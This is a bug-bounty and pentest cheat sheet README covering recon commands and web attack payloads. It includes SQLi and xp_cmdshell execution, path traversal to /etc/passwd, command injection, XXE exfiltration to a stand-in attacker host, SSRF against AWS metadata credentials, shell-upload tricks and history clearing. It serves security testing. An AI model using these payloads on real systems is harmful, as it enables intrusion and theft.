ireemak / easyg Goto Github PK

███████╗ █████╗ ███████╗██╗   ██╗ ██████╗
██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔════╝
█████╗  ███████║███████╗ ╚████╔╝ ██║  ███╗
██╔══╝  ██╔══██║╚════██║  ╚██╔╝  ██║   ██║
███████╗██║  ██║███████║   ██║   ╚██████╔╝
╚══════╝╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝
Made with <3 by Riccardo Malatesta (@seeu)

EasyG started out as a script that I use to automate some information gathering tasks for my hacking process, you can find it here. Now it's more than that. Here I gather all the resources about hacking that I find interesting: notes, payloads, tools and more.

• Resources
• Useful tips
• Check-lists
  • Testing layers
  • Multiple targets
  • Single target
• Content Discovery
  • Google Dorking
  • GitHub Dorking
• Tools
  • Burp Suite
• Network
• Linux
• Mobile
• Source code review
• Web vulnerabilities
  • SQL Injection
  • Authentication vulnerabilities
  • Directory Traversal
  • OS Command Injection
  • Business logic vulnerabilities
  • Information Disclosure
  • Access control vulnerabilities and privilege escalation
  • File upload vulnerabilities
  • Server-side request forgery (SSRF)
  • Open redirection
  • XXE injection
  • Cross-site scripting (XSS)
  • Cross-site request forgery (CSRF)
  • Cross-origin resource sharing (CORS)
  • Clickjacking
  • DOM-based vulnerabilities
  • WebSockets
  • Insecure deserialization
  • Server-side template injection
  • Web cache poisoning
  • HTTP Host header attacks
  • HTTP request smuggling
  • OAuth authentication
  • JWT Attacks
  • Abusing S3 Bucket Permissions
  • Google Cloud Storage bucket
  • GraphQL
  • WordPress
  • IIS - Internet Information Services
  • Lotus Domino
  • Git source code exposure
  • Subdomain takeover
  • 4** Bypass
  • Application level Denial of Service
• Thick client vulnerabilities
  • DLL Hijacking
  • Insecure application design
  • Weak Hashing Algorithms
  • Cleartext secrets in memory
  • Hardcoded secrets
  • Unsigned binaries
  • Lack of verification of the server certificate
  • Insecure SSL/TLS configuration
  • Remote Code Execution via Citrix Escape
  • Direct database access
  • Insecure Windows Service permissions
  • Code injection
  • Windows persistence
• Artificial intelligence vulnerabilities
  • Prompt Injection

Blogs

• Skeleton Scribe (albinowax)
• PortSwigger Research

Reports

• Pentest reports
• Public pentesting reports
• Facebook-BugBounty-Writeups
• List of bug-bounty writeups

News

• CVE trends
• Packet Storm
• PortSwigger/research
• all InfoSec news

• For RCE
  • Never upload a shell at first, you can be banned from a program. Just execute a whoami as a PoC, proceed with a shell if required/allowed.
• For stored XSS
  • console.log() is better than alert(), it makes less noise especially for stored XSS.
• For SQLi
  • Don't dump the entire db, you can be banned from a program. Just retrieve the db's name, version and/or other minor infos. Proceed with db dump only if required/allowed;
  • Don't use tautologies like OR 1=1, it can end up in a delete query or something dangerous. It's better to use AND SLEEP(5) or te'+'st.
• For subdomain takeovers
  • use as a PoC an html page like:
    9a69e2677c39cdae365b49beeac8e059.html

    <!-- PoC by seeu -->

• SMB-Checklist
• Win32 Offensive Cheatsheet
• Regexp Security Cheatsheet
• Cheat-Sheet - Active-Directory
• Security Testing of Thick Client Application

• Integrations
• Application Libraries (usually JavaScript)
• Application: Custom Code or COTS
• Application Framework
• Web Hosting Software (Default creds, Web server misconfigurations, web exploits)
• Open Ports and Services (Default creds on services, service level exploits)

• Run EasyG assetenum
• Select the interesting targets
  • Pass the subdomains to Burp Suite
  • Open them in Firefox
• Check for mobile/desktop applications
  • If there are any other non-web application, use Apkleak and Source2Url (even if OoS)

• Recon
  • Explore the app, see and every functionality (eventually, search for documentation)
  • Crawl with Burp Suite and other tools
  • Collect endpoints with BurpJSLinkFinder
  • Find more endpoints with Google Dorking and see Content Discovery
  • Check the Testing layers
• Authentication
  • See Authentication vulnerabilities
  • Account Section
    • Profile
      • Stored or Blind XSS
    • App Custom Fields
    • Integrations
      • SSRF, XSS
• Upload Functions
• Email functions, check if you can send emails from the target
  • Spoofing
  • HTML Injection
  • XSS
• Feedback functions
  • Look for Blind XSS
• Broken Access Control, IDOR & co
  • IDOR Checklist
• Content Types
  • Look for multipart-forms
  • Look for content type XML
  • Look for content type json
• APIs
  • Methods
  • API Security Checklist
• Errors
  • Change POST to GET
• OWASP Cheat Sheet Series, check also
  • OWASP Testing Guide
  • OWASP Web Application Penetration Checklist
• Look at the index of this repo and see if you've missed anything interesting

Some tips

• If the application is ASP.NET, search for Appsettings.json
• Use recursion. If you encounter a 401 response, search with waybackmachine
• Search for past reports in the same program

Check the tech of a target with

• Wappalyzer
• Webanalyze Port of Wappalyzer for command line ./webanalyze -host example.com -crawl 1
• Shodan

Tools

• feroxbuster
  • feroxbuster -u https://example.com/ --proxy http://127.0.0.1:8080 -k -w wordlist.txt -s 200,403
• dirsearch
  • dirsearch -l list.txt -x 404,500,501,502,503 -e *
  • dirsearch -u target.io -x 404,500,501,502,503 -e *
• changedetection.io
• ffuf

Crawling

• gospider
  • gospider -s target -c 10 -d 4 -t 20 --sitemap --other-source -p http://localhost:8080 --cookie "0=1" --blacklist ".(svg|png|gif|ico|jpg|jpeg|bpm|mp3|mp4|ttf|woff|ttf2|woff2|eot|eot2|swf|swf2|css)"
• hakrawler
  • cat target.txt | hakrawler -u -insecure -t 20 -proxy http://localhost:8080 -h "Cookie: 0=1"
• Katana
  • katana -u target -jc -kf -aff -proxy http://127.0.0.1:8080" -H "Cookie: 0=1"

Wordlists

• SecLists
• wordlists.assetnote.io
• content_discovery_all.txt
• OneListForAll
• wordlistgen
• Scavenger

To find more endpoints

• Apkleak to get endpoints from an apk
• Source2Url to get endpoints from a source code
• waymore more results from the Wayback Machine
• BurpJSLinkFinder
• trashcompactor to remove URLs with duplicate funcionality based on script resources included

• ext: to search for: php, php3, aspx, asp, jsp, xhtml, phtml, html, xsp, nsf, form,swf;
• Search also for pdf, xlsx, bak and similar, they may contain some infos;
• site: to target a website and its subdomains;
• inurl:& to search for parameters;
• intitle: to search interesting pages like admin, register, login etc.
• "Seeing something unexpected? Take a look at the GitHub profile guide." "COMPANY-TARGET" site:http://github.com [Reference]
• intext:"© copyright COMPANY YEAR" [Reference]
• site:target.com intext:login intext:username intext:password
• Exposed .git intext:"index of /.git" "parent directory"
• Search for s3 buckets site:.s3.amazonaws.com "COMPANY"
• Find CVEs, like CVE-2019-9647 intext:"Powered by Gila CMS"
• Errors site:target.com intext:"Warning: mysql_num_rows()"
• intitle:"Index of /" + ".htaccess"
• Google Dorks - Cloud Storage:

  site:http://s3.amazonaws.com "target.com"
  site:http://blob.core.windows.net "target.com"
  site:http://googleapis.com "target.com"
  site:http://drive.google.com "target.com"
  

• sensitive words: password, api_key, access_key, dbpassword, dbuser, pwd, pwds, aws_access, key, token, credentials, pass, pwd, passwd, private, preprod, appsecret
• languages: json, bash, shell, java etc., example HEROKU_API_KEY language:json
• extensions: extensions: bat, config, ini, env etc.
• filename: netrpc, .git-credentials, .history, .htpasswd, bash_history
• Other dorks

For a temporary public server

• XAMPP + ngrok
• beeceptor

For auths

• textverified.com for auths requiring a phone number
• temp-mail.org

To find parameters

• Arjun detection of the parameters present in the application
• ParamSpider

Asset enumeration/discovery

• amass
  • amass enum -brute -active -d target -o output/target.txt -v
• subfinder
  • subfinder -d target -all -o output/target_subfinder.txt"
• github-subdomains
• nmap
  • Discover everything + services nmap -p 1-65535 -sV -T4 -Pn -n -vv -iL target.txt -oX out.xml
• bgp.he.net to find ASN + amass intel -asn <ASN>
• crt.sh
  • Crtsh-Fetcher
  • To find new domains cat json.txt | jq -r '.[].common_name' | sed 's/\*//g' | sort -u | rev | cut -d "." -f 1,2 | rev | sort -u | tee out.txt
• naabu
  • Discover everything faster naabu -l 1.txt -v -p - -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -c 1000 -rate 7000 -stats -o 1_o.txt
  • naabu -v -list subs.txt -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -stats -o out.txt
• gobuster + all.txt by jhaddix
  • gb.rb
• dnsx
  • Reverse DNS lookup cat ip.txt | dnsx -ptr -resp-only
• VhostScan to discover virtual hosts
• gip a command-line tool and Rust library to check global IP address.
• httprobe
  • type subs.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -c 150 > out.txt
• anew to add only new subdomains
• httpx
  • type scope.txt | httpx -sc -mc 404

Vulnerabilities

• LinPEAS - Linux Privilege Escalation Awesome Script
• BruteSpray python brutespray.py --file nmap.xml --threads 5 --hosts 5
• nuclei
  • Automatic Selection nuclei -u http://target.io -as
  • Check for Technologies %USERPROFILE%\nuclei-templates\technologies
  • Check for more -t %USERPROFILE%\nuclei-templates\misconfiguration -t %USERPROFILE%\nuclei-templates\cves -t %USERPROFILE%\nuclei-templates\cnvd
  • Use it in a workflow cat subdomains.txt | httpx | nuclei -t technologies
  • To use tags combined with automatic selection nuclei -l list.txt -as -tags log4j -o output.txt

For Reporting

• Vulnerability Rating Taxonomy
• CVSS Calculator
• PwnDoc
• Vulnrepo
• PlexTrac

Other

• URL Decoder/Encoder
• base64encode.org
• Down or not
• DigitalOcean See Setting Up Your Ubuntu Box for Pentest and Bug Bounty Automation
• Exploit Database
• USB Rubber Ducky
• Flipper Zero
• Create a random text file

To add a domain + subdomains in advanced scopes: ^(.*\.)?test\.com$

To add a new header

1. Go to Proxy -> Options -> Match and Replace -> Add
2. Change Type to Request Header
3. As the default text says in Match 'leave blank to add a new header'
4. Put the new header in Replace

Cool extensions:

• Turbo Intruder
• HTTP Request Smuggler
• Wsdler to interact with SOAP
• InQL
• Swagger-EZ
• BurpCustomizer
• Software Version Reporter
• Software Vulnerability Scanner
• IP Rotate
• Autorize
  • Auth Analyzer
• Active Scan++
• BurpJSLinkFinder
• Anonymous Cloud
• AWS Security Checks
• Upload Scanner
• Taborator
• AutoRepeater
• JWT Editor
• GetAllParams evolution
• Burp Bounty

Browser extensions:

• Trufflehog Chrome Extension
• Wappalyzer
• Shodan for Chrome and for Firefox
• DotGit

ip route add <net_address_in_cdr> via <interface_gateway>
route add <net_address_in_cdr> mask <net_address_mask_in_cdr> <interface_gateway> (Windows)
nmap -sn <net_address_in_cdr> | Check hosts alive, adding -A you gather more info for a target

Resources

• Echo Mirage
• Wireshark
• PCredz
• Impacket
• putty
• MobaXterm
• proxychains
  • learning hacking? DON'T make this mistake!! (hide yourself with Kali Linux and ProxyChains)

Linux Commands

netstat -tulpn                                        Show Linux network ports with process ID’s (PIDs)
watch ss -stplu                                       Watch TCP, UDP open ports in real time with socket summary.
lsof -i                                               Show established connections.
macchanger -m MACADDR INTR                            Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24                          Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24                        Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR                        Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500                                Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x 192.168.1.1                                    Dig reverse lookup on an IP address.
host 192.168.1.1                                      Reverse lookup on an IP address, in case dig is not installed.
dig @192.168.2.2 domain.com -t AXFR                   Perform a DNS zone transfer using dig.
host -l domain.com nameserver                         Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x                                    Get hostname for IP address.
ip addr add 192.168.2.22/24 dev eth0                  Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com                            Blocks access to google.com from the host machine.
echo \"1\" > /proc/sys/net/ipv4/ip_forward              Enables IP forwarding, turns Linux box into a router – handy for routing traffic through a box.
echo \"8.8.8.8\" > /etc/resolv.conf                     Use Google DNS.  

Linux User Management

whoami                                                Shows currently logged in user on Linux.
id                                                    Shows currently logged in user and groups for the user.
last                                                  Shows last logged in users.
mount                                                 Show mounted drives.
df -h                                                 Shows disk usage in human readable output.
echo \"user:passwd\" | chpasswd                         Reset password in one line.
getent passwd                                         List users on Linux.
strings /usr/local/bin/blah                           Shows contents of none text files, e.g. whats in a binary.
uname -ar                                             Shows running kernel version.
PATH=$PATH:/my/new-path                               Add a new PATH, handy for local FS manipulation.
history                                               Show bash history, commands the user has entered previously.

Linux File Commands

df -h blah                                            Display size of file / dir Linux.
diff file1 file2                                      Compare / Show differences between two files on Linux.
md5sum file                                           Generate MD5SUM Linux.
md5sum -c blah.iso.md5                                Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah                                             Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix                                              Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file                     Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file                  Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file                            Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf                                                Remove files and directories without prompting for confirmation.

Misc Commands

init 6                                                Reboot Linux from the command line.
gcc -o output.c input.c                               Compile C code.
gcc -m32 -o output.c input.c                          Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTORYFILE                                     Disable bash history logging.
rdesktop X.X.X.X                                      Connect to RDP server from Linux.
kill -9 $$                                            Kill current session.
chown user:group blah                                 Change owner of file or dir.
chown -R user:group blah                              Change owner of file or dir and all underlying files / dirs – recersive chown.
chmod 600 file                                        Change file / dir permissions, see [Linux File System Permissons](#linux-file-system-permissions) for details.
ssh [email protected] | cat /dev/null > ~/.bash_history    Clear bash history

Linux File System Permissions

777 rwxrwxrwx                                         No restriction, global WRX any user can do anything.
755 rwxr-xr-x                                         Owner has full access, others can read and execute the file.
700 rwx------                                         Owner has full access, no one else has access.
666 rw-rw-rw-                                         All users can read and write but not execute.
644 rw-r--r--                                         Owner can read and write, everyone else can read.
600 rw-------                                         Owner can read and write, everyone else has no access.

Linux Directories

/                                                     / also know as “slash” or the root.
/bin                                                  Common programs, shared by the system, the system administrator and the users.
/boot                                                 Boot files, boot loader (grub), kernels, vmlinuz
/dev                                                  Contains references to system devices, files with special properties.
/etc                                                  Important system config files.
/home                                                 Home directories for system users.
/lib                                                  Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found                                           Files that were saved during failures are here.
/mnt                                                  Standard mount point for external file systems.
/media                                                Mount point for external file systems (on some distros).
/net                                                  Standard mount point for entire remote file systems – nfs.
/opt                                                  Typically contains extra and third party software.
/proc                                                 A virtual file system containing information about system resources.
/root                                                 root users home dir.
/sbin                                                 Programs for use by the system and the system administrator.
/tmp                                                  Temporary space for use by the system, cleaned upon reboot.
/usr                                                  Programs, libraries, documentation etc. for all user-related programs.
/var                                                  Storage for all variable files and temporary files created by users, such as log files, mail queue,
                                                      print spooler. Web servers, Databases etc.

Linux Interesting Files / Directories

/etc/passwd                                           Contains local Linux users.
/etc/shadow                                           Contains local account password hashes.
/etc/group                                            Contains local account groups.
/etc/init.d/                                          Contains service init script – worth a look to see whats installed.
/etc/hostname                                         System hostname.
/etc/network/interfaces                               Network interfaces.
/etc/resolv.conf                                      System DNS servers.
/etc/profile                                          System environment variables.
~/.ssh/                                               SSH keys.
~/.bash_history                                       Users bash history log.
/var/log/                                             Linux system log files are typically stored here.
/var/adm/                                             UNIX system log files are typically stored here.
/var/log/apache2/access.log                           Apache access log file typical path.
/var/log/httpd/access.log                             Apache access log file typical path.
/etc/fstab                                            File system mounts.

FlappyBird_structure.apk
├── AndroidManifest.xml meta-information about the app
├── META-INF/ a manifest of metadata information
├── classes.dex contains the Java libraries that the application uses
├── lib/ compiled native libraries used by the app
├── res/ It can store resource files such as pictures, XML files, etc.
├── assets/ application assets
└── resources.arsc contains compiled resources in a binary format

Data storage search for PII unencrypted in

• Phone system logs
• Webkit cache
• Dbs, plists, etc.
• Hardcoded in the binary

Resources

• Mobile Application Penetration Testing Cheat Sheet
• Mobile Hacking Cheatsheet
• OWASP Mobile Application Security

Android tools

• m.apkpure.com Download APKs
• apps.evozi.com Download APKs
• apk-dl.com Download APKs
• adb it is used to debug an android device
• HTTP Toolkit to see requests on a non-rooted or emulated device
• Genymotion an android emulator
• Android Studio Android application development, useful also for the emulator
  • Note: to start only the emulator, use commands such as

    cd C:\Users\Riccardo\AppData\Local\Android\Sdk\emulator
    emulator -avd Pixel_4_XL_API_30

• Java Decompiler
• dex2jar decompile an .apk into .jar
• jadx-gui another tool for producing Java source code from Android Dex and Apk files
• apktool to unpack an apk

• Search for known dangerous functions used on user-supplied input
  • example, eval( can cause command injection without proper sanitization
• Search for hardcoded credentials such as API keys, encryption keys and database passwords
  • many API keys start with the same format (ex. AWS keys usually start with AKIA), search for patterns from ServletTarPit.java, Tarpit Java
• Search for weak cryptography or hashing algorithms
• Search for outdated dependencies
• Search for revealing comments

Digging deeeper

• Prioritize functions like authentication, autorization, PII etc.
  • example: disclosing PII in the logs, from OrderStatus.java
  • example: SQL injection in OrderStatus.java
• Follow any code that deals with user input

Automation

• Use SAST tools
• Use SCA tools
• Use secret scanners
• Then test the results manually

Resources

• How to Analyze Code for Vulnerabilities
• OWASP Code Review Guide
• Tarpit Java
• TruffleHog
• GitLeaks
• Visual Studio Code for Source Code Analysis
• beautifier.io for JavaScript Analysis

Tools

• SQL injection cheat sheet
• SQL Injection cheat sheets | pentestmonkey

sqlmap

 > SQLMap: sqlmap -u https://vulnerable/index.php?id=1
                  --tables (to see db)
                  -D DATABASE_NAME -T TABLE_NAME --dump (to see data)
                  --forms --batch --crawl=10 --random-agent --level=5 --risk=3 (to crawl)
		  -l (to parse a Burp log file)
		  --parse-errors --current-db --invalid-logical --invalid-bignum --invalid-string --risk 3		  
		  --force-ssl --threads 5 --level 1 --risk 1 --tamper=space2comment

Some payloads

• 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

• 0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z

• 0'or(now()=sysdate()&&SLEEP(1))or'Z

RCE

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell 'COMMAND';

EXEC sp_configure 'allow updates', 0
RECONFIGURE
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 1
GO
RECONFIGURE
GO
xp_cmdshell 'COMMAND';

• Multi-factor authentication
  • Response manipulation, try to intercept the response and modify the status to 200
  • Status code manipulation, change the code from 4xx to 200
  • 2FA code leakage in the response
  • JS File Analysis
  • 2FA Code Reusability
  • Lack of Bruteforce protection
  • The 2FA code can be used for any user
  • CSRF on 2FA disabling
  • Password reset disable 2FA
  • Bypass 2FA with null or 000000
  • Access the content directly
  • Login with Oauth to bypass 2FA
  • If you get logged-out after failed attempts, use macros with Burp
• Password reset
  • Change the Host with the host of your server. The request for a password reset might use the Host value for the link with the reset token
  • Try with headers like X-Forwarded-Host:
  • Via dangling markup
    • Host: victim.com:'<a href="//attacker.com/?
  • Insert two emails, like:
    • [email protected];[email protected]
    • email:["[email protected]","[email protected]"]
• Password change
• Keeping users logged in
• Rate-limit
  • Bypass with X-Forwarded-For:127.0.0.1-1000
  • IP rotating, you can use
    • mubeng
    • Burp extension: IP Rotate
  • Log in into a valid account to reset the rate-limit
• Test remember me functionality
• Web Cache Deception
  • Attacker send to a victim a 404 endpoint like site.com/dir/ok.css
  • Victim click on it, the CDN cache the page
  • Attacker goes to site.com/dir/ok.css, now it can see the page of the Victim
• PHP protections can be bypassed with [], like password=123 to password[]=123
• Replace password with a list of candidates, example

  "username":"usertest"
  "password":[
   "123456",
   "password",
   "qwerty",
   ...

• Search for Open Redirect in login and register

• simple case https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini
• absolute path https://insecure-website.com/loadImage?filename=/etc/passwd
• stripped non-recursively https://insecure-website.com/loadImage?filename=....//....//....//etc/passwd
• superfluous URL-decode https://insecure-website.com/loadImage?filename=..%252f..%252f..%252fetc/passwd
• validation of start of path https://insecure-website.com/loadImage?filename=/var/www/images/../../../etc/passwd
• validation of start of path https://insecure-website.com/loadImage?filename=../../../etc/passwd%00.png

Let's say that the vulnerable endpoint it's https://insecure-website.com/stockStatus?productID=381&storeID=29. The provide the stock information, the application runs the command stockpile.pl 381 29. If there is no OS Command Injection protection, by inserting the payload & echo abcdefg & in productID it's possible to execute the command echo.

For blind OS Command Injections

• Time delay & ping -c 10 127.0.0.1 &
• Redirecting output & whoami > /var/www/static/whoami.txt &
• Out-of-band (OAST) techniques & nslookup kgji2ohoyw.web-attacker.com &

Ways of injecting OS commands

• Both Windows and Unix-based systems
  • &
  • &&
  • |
  • ||
• Unix-based systems only
  • ;
  • Newline with 0x0a or \n
  • injected command
  • $(injected command)

Resource

• commix-testbed

Examples

• Excessive trust in client-side controls
• 2FA broken logic
• Failing to handle unconventional input
• Inconsistent security controls
• Weak isolation on dual-use endpoint
• Password reset broken logic
• Insufficient workflow validation
• Flawed enforcement of business rules
• Authentication bypass via encryption oracle

What is information disclosure?

• Data about other users, such as usernames or financial information
• Sensitive commercial or business data
• Technical details about the website and its infrastructure

What are some examples of information disclosure?

• Revealing the names of hidden directories, their structure, and their contents via a robots.txt file or directory listing
• Providing access to source code files via temporary backups
• Explicitly mentioning database table or column names in error messages
• Unnecessarily exposing highly sensitive information, such as credit card details
• Hard-coding API keys, IP addresses, database credentials, and so on in the source code
• Hinting at the existence or absence of resources, usernames, and so on via subtle differences in application behavior
• If you need to find UUID from an email, try to register the user and see if in the response it's disclosed. [Reference]

How do information disclosure vulnerabilities arise?

• Failure to remove internal content from public content
• Insecure configuration of the website and related technologies
• Flawed design and behavior of the application

In the context of web applications, access control is dependent on authentication and session management:

• Authentication identifies the user and confirms that they are who they say they are;
• Session management identifies which subsequent HTTP requests are being made by that same user;
• Access control determines whether the user is allowed to carry out the action that they are attempting to perform.

From a user perspective, access controls can be divided into the following categories:

• Vertical access controls Mechanisms that restrict access to sensitive functionality that is not available to other types of users
• Horizontal access controls Mechanisms that restrict access to resources to the users who are specifically allowed to access those resources
• Context-dependent access controls Restrict access to functionality and resources based upon the state of the application or the user's interaction with it

Tools

• Autorize
• Authz
• UUID Detector
• Check also endpoints in JS files

Upload Functions check-list

• Check if the method PUT is enabled
• Integrations (from 3rd party)
  • XSS
• Self Uploads
  • XML based (Docs/PDF)
    • SSRF, XSS
  • Image
    • XSS, Shell
      • Name
      • Binary header
      • Metadata
• Where is data stored?
  • s3 perms
  • GCS perms

Extension Splitting

• shell.php%00.png
• shell.php%0A.png
• shell.php\n.png
• shell.php\u000a.png
• shell.php\u560a.png
• shell.php%E5%98%8A.png
• shell.php;.png
• shell.php%3B.png
• shell.php\u003b.png
• shell.php\u563b.png
• shell.php%E5%98%BB.png

multipart/form-data POST request

POST / HTTP/2
Host: example.io
Content-Type: multipart/form-data; boundary=---------------------------374598703146120535182333328
Content-Length: 342

-----------------------------374598703146120535182333328
Content-Disposition: form-data; name="key"

general
-----------------------------374598703146120535182333328
Content-Disposition: form-data; name="file"; filename="file.pdf"
Content-Type: application/pdf

$content$
-----------------------------374598703146120535182333328--

Resources

• Common MIME types
• How I earned $500 by uploading a file: write-up of one of my first bug bounty

SSRF with blacklist-based input filters bypass Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using various techniques:

• Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1;
• Registering your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose or the domain firefox.fr is a DNS that point to 127.0.0.1.;
• Obfuscating blocked strings using URL encoding or case variation.

SSRF with whitelist-based input filters bypass

• You can embed credentials in a URL before the hostname, using the @ character. For example: https://expected-host@evil-host.
• You can use the # character to indicate a URL fragment. For example: https://evil-host#expected-host.
• You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: https://expected-host.evil-host.
• You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
• You can use combinations of these techniques together.

Other tips

• By combining it with an Open redirection, you can bypass some restrictions. An example: http://vulnerable.com/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
• For AWS, bypass some restrictions by hosting this PHP page [Reference]

  <?php header('Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role', TRUE, 303); ?>

• If everything fails, look for assets pointing to internal IPs. You can usually find these via CSP headers, JS files, Github, shodan/censys etc. [Reference]
• SSRF (Server Side Request Forgery) testing resources

Common endpoints

• Webhooks
  • Try to send requests to internal resources
• PDF Generator
  • If there is an HTML Injection in a PDF generator, try call internal resources with something like <iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" title="SSRF test">, with these tags <img>, <script>, <base> or with the CSS element url()
• Document parsers
  • If it's an XML doc, use the PDF Generator approach
  • In other scenarios, see if there is any way to reference external resources and let server make requests to internal resources
• Link expansion, [Reference]
• File uploads
  • Instead of uploading a file, upload a URL. An example
  • Use an SVG file

    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    	<image xlink:href="https://example.com/test.png"/>
    </svg>

Bypasses

• https://attacker.com?victim.com
• https://attacker.com;victim.com
• https://attacker.com/victim.com/../victimPATH
• https://victim.com.attacker.com
• https://attackervictim.com
• https://[email protected]
• https://attacker.com#victim.com
• https://attacker.com\.victim.com
• https://attacker.com/.victim.com
• https://subdomain.victim.com/r/redir?url=https%3A%2F%2Fvictim.com%40ATTACKER_WEBSITE.COM?x=subdomain.victim.com%2f
• https://www.victim.com/redir/r.php?redirectUri=https://attacker%E3%80%82com%23.victim.com/
• https://www.victim.com/redir/r.php?redirectUri=/%0d/attacker.com/

• Exploiting XXE to retrieve files
  Original

  <?xml version="1.0" encoding="UTF-8"?>
  <stockCheck><productId>381</productId></stockCheck>

  Modified

  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
  <stockCheck><productId>&xxe;</productId></stockCheck>

• Exploiting XXE to perform SSRF attacks

  <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerablewebsite.com/"> ]>

• Exploiting blind XXE exfiltrate data out-of-band
  Example

  <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://web-attacker.com"> %xxe; ]>

• Exfiltrate data out-of-band
  for-the-malicious-web-server.dtd

  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://webattacker.com/?x=%file;'>">
  %eval;
  %exfil;

  Submit to vulnerable server

  <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://webattacker.com/malicious.dtd"> %xxe;]>

• Exploiting blind XXE to retrieve data via error messages

  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
  %eval;
  %error;

• Exploiting blind XXE by repurposing a local DTD
  Suppose there is a DTD file on the server filesystem at the location /usr/local/app/schema.dtd

  <!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
  <!ENTITY % custom_entity '
  <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
  <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM
  &#x27;file:///nonexistent/&#x25;file;&#x27;>">
  &#x25;eval;
  &#x25;error;
  '>
  %local_dtd;
  ]>

  To locate the DTD file, submit the payload

  <!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM
  "file:///usr/share/yelp/dtd/docbookx.dtd">
  %local_dtd;
  ]>

• Try with xinclude to achieve SSRF or LFI

  <?xml version="1.0" encoding="utf-8" ?>
  <username xmls:xi="https://w3.org/2001/XInclude">
    <xi:include parse="text" href="file:///c:/windows/win.ini">
  </username>

Attack surfaces

• XInclude attacks

  <foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/></foo>

• XXE attacks via file upload with .svg

  <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITYxxe SYSTEM "file:///etc/hostname" > ]>
  <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
   <text font-size="16" x="0" y="16">&xxe;</text>
  </svg>

• XXE attacks via modified content type
  For example, Content-Type: application/x-www-form-urlencoded -> Content-Type: text/xml

Manually testing for XXE vulnerabilities generally involves

• Testing for file retrieval
• Testing for blind XXE vulnerabilities
• Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document

Resources

• xsscrapy
  • python3 version
• For blind XSS
  • XSS Hunter Express
  • XSS Hunter
• AwesomeXSS
• Weaponised XSS payloads
• Cross-site scripting (XSS) cheat sheet
• Articles
  • Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read
  • Exploiting XSS via Markdown
  • XSS to Exfiltrate Data from PDFs

CSP

• csp-evaluator.withgoogle.com
• CSP Auditor
• CSP Bypass

Swagger XSS

• swagger-api/swagger-ui#1262
• swagger-api/swagger-ui#3847
  ?url=https://raw.githubusercontent.com/seeu-inspace/easyg/main/XSS%20all%20the%20things/swag-test.json
• Hacking Swagger-UI - from XSS to account takeovers
  ?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3NlZXUtaW5zcGFjZS9lYXN5Zy9tYWluL1hTUyUyMGFsbCUyMHRoZSUyMHRoaW5ncy9zd2FnLXRlc3QueWFtbCIKfQ==
• Nuclei template %USERPROFILE%\nuclei-templates\exposures\apis\swagger-api.yaml

Blind XSS

• Insert a payload in the User-Agent, try with the match/replace rule
• Other endpoints: pending review comments, feedback

Bypasses

• https://www.googleapis.com/customsearch/v1?callback=alert(document.domain)
• JSFuck
• Path Relative style sheet injection
